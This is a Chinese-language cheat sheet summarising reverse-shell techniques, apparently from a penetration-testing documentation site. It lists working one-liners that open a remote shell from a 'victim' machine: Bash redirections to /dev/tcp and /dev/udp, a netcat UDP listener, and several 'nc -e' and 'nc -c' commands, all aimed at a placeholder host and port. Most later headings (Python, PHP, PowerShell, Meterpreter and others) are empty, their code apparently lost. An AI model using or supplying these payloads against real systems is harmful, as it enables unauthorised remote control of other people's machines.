反弹shell的总结

更多请看工具篇--->代理工具&&国外

Bash TCP:

Victim:

bash -i >& /dev/tcp/127.0.0.1/8080 0>&1
/bin/bash -i > /dev/tcp/127.0.0.1/8080 0<& 2>&1
exec 5<>/dev/tcp/127.0.0.1/8080;cat <&5 | while read line; do $line 2>&5 >&5; done
exec /bin/sh 0</dev/tcp/127.0.0.1/8080 1>&0 2>&0
0<&196;exec 196<>/dev/tcp/127.0.0.1/8080; sh <&196 >&196 2>&196

Bash UDP:

Victim:

sh -i >& /dev/udp/127.0.0.1/8080 0>&1

Listener:

nc -u -lvp 8080

Netcat:

nc -e /bin/sh 127.0.0.1 8080
nc -e /bin/bash 127.0.0.1 8080
nc -c bash 127.0.0.1 8080

Ncat:

Telnet:

Socat:

Victim:

Listener:

Victim:

Perl:

Victim:

Windows only, Victim:

Python:

IP v4

Copy IP v6

Copy Windows only:

PHP:

Ruby:

NOTE: Windows only

OpenSSL:

Attacker:

Copy or

Copy Victim:

Powershell:

Awk:

TCLsh

Java:

War:

Lua:

Linux only

Windows and Linux

NodeJS:

Groovy:

Meterpreter Shell:

Xterm:

最后更新于

这有帮助吗?